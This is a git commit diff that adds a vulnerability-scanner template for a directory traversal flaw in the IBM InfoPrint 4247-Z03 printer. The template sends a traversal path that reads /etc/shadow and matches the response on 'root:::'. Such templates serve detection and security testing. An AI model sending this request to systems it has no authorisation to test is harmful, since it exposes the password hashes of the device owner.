commit
507dfb782a
|
@ -0,0 +1,22 @@
|
|||
id: IBM InfoPrint Directory Traversal
|
||||
|
||||
info:
|
||||
name: IBM InfoPrint 4247-Z03 Impact Matrix Printer - Directory Traversal
|
||||
author: Harsh Bothra
|
||||
severity: Medium
|
||||
|
||||
# source:- https://www.exploit-db.com/exploits/47835
|
||||
|
||||
requests:
|
||||
- method: GET
|
||||
path:
|
||||
- '{{BaseURL}}/./../../../../../../../../../../etc/shadow'
|
||||
|
||||
matchers-condition: and
|
||||
matchers:
|
||||
- type: status
|
||||
status:
|
||||
- 200
|
||||
- type: word
|
||||
words:
|
||||
- "root:::"
|
Loading…
Reference in New Issue